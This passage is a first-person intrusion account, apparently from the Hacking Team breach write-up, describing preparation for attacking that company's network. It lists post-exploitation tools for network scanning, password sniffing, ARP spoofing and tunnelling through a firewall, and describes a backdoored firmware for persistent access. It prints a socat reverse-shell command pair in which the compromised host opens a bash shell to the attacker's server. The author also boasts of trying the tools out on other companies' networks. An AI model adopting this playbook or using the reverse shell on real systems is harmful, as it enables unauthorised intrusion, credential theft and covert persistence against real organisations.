Be Prepared

I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device. The backdoor serves to protect the exploit. Using the exploit just once and then returning through the backdoor makes it harder to identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox

For all the standard Unix utilities that the system didn't have.

2) nmap

To scan and fingerprint Hacking Team's internal network.

3) Responder.py

The most useful tool for attacking Windows networks when you have access to the internal network but no domain user.

4) Python

To execute Responder.py.

5) tcpdump

For sniffing traffic.

6) dsniff

For sniffing passwords from plaintext protocols like FTP, and for ARP spoofing. I wanted to use ettercap, written by Hacking Team's own ALoR and NaGA, but it was hard to compile it for the system.

7) socat

For a comfortable shell with a pty:

    my_server:  socat file:`tty`,raw,echo=0 tcp-listen:my_port
    hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
                tcp:my_server:my_port

It's useful for a lot more, too: it's a networking Swiss Army knife. See the examples section of its documentation.

8) screen

Like the shell with pty, it wasn't really necessary, but I wanted to feel at home in Hacking Team's network.

9) a SOCKS proxy server

To use with proxychains to be able to access their local network from any program.

10) tgcd

For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/

The worst thing that could happen would be for my backdoor or post-exploitation tools to make the system unstable and cause an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network.